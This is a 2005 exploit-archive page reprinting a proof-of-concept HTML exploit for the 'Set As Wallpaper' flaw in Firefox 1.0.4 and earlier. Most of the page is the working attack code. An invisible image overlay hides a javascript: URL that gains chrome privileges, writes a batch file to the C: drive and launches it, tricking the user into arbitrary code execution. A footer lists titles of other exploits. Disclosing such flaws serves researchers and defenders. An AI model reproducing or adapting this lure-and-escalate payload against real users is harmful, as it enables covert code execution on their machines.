exploits , vulnerabilities , articles , Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit

2005-07-12

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit

Rated as : Critical 

// Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN">
<html>
<head>
<title>Firewalling - Proof-of-Concept</title> 
<script>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div
style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter
without validating it.
This allows to execute javascript in chrome and to run arbitrary code. 
<br><br>
By using absolute positioning and the moz-opacity filter an attacker can
easily fool the
user to think he is setting a valid image as wallpaper.
<br><br>
Right click on the image and choose "Set As Wallpaper". The demo
requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch
file
that shows a directoy listing in a dos box (Windows only).
<br><br>

<div style="position:relative; width:300px;
height:250px;">
<img
src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)==\'chrome\'){netscape.security.PrivilegeManager.enablePrivilege(\'
UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\
booom.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;
1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output=\'@ECHO
OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250"
alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="image.png" width="300"
height="250" alt="" border="0"
style="position:
absolute; left:0px; top:0px; z-index:1;"
onload="stopload()">
</div>
</div>
</body>

</html>
securitydot.net - 2005-07-12

Exploits - newest 10 RSS | More

2007-06-15 56752 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33854 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41972 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29099 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19537 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16520 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19181 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16381 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33335 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17044 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit